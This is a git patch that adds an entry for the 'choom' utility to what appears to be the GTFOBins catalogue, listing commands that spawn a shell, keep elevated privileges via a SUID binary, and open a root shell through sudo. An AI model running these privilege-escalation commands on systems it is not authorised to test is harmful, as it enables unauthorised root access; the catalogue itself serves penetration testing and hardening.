From 58bca80e6c0090cce7d70e86dba94c3ae3e3e9f3 Mon Sep 17 00:00:00 2001 From: Miguel R Date: Fri, 13 May 2022 09:28:11 +0200 Subject: [PATCH] Add choom Co-authored-by: Andrea Cardaci --- _gtfobins/choom.md | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 _gtfobins/choom.md diff --git a/_gtfobins/choom.md b/_gtfobins/choom.md new file mode 100644 index 0000000..b1d460f --- /dev/null +++ b/_gtfobins/choom.md @@ -0,0 +1,9 @@ +--- +functions: + shell: + - code: choom -n 0 /bin/sh + suid: + - code: ./choom -n 0 -- /bin/sh -p + sudo: + - code: sudo choom -n 0 /bin/sh +---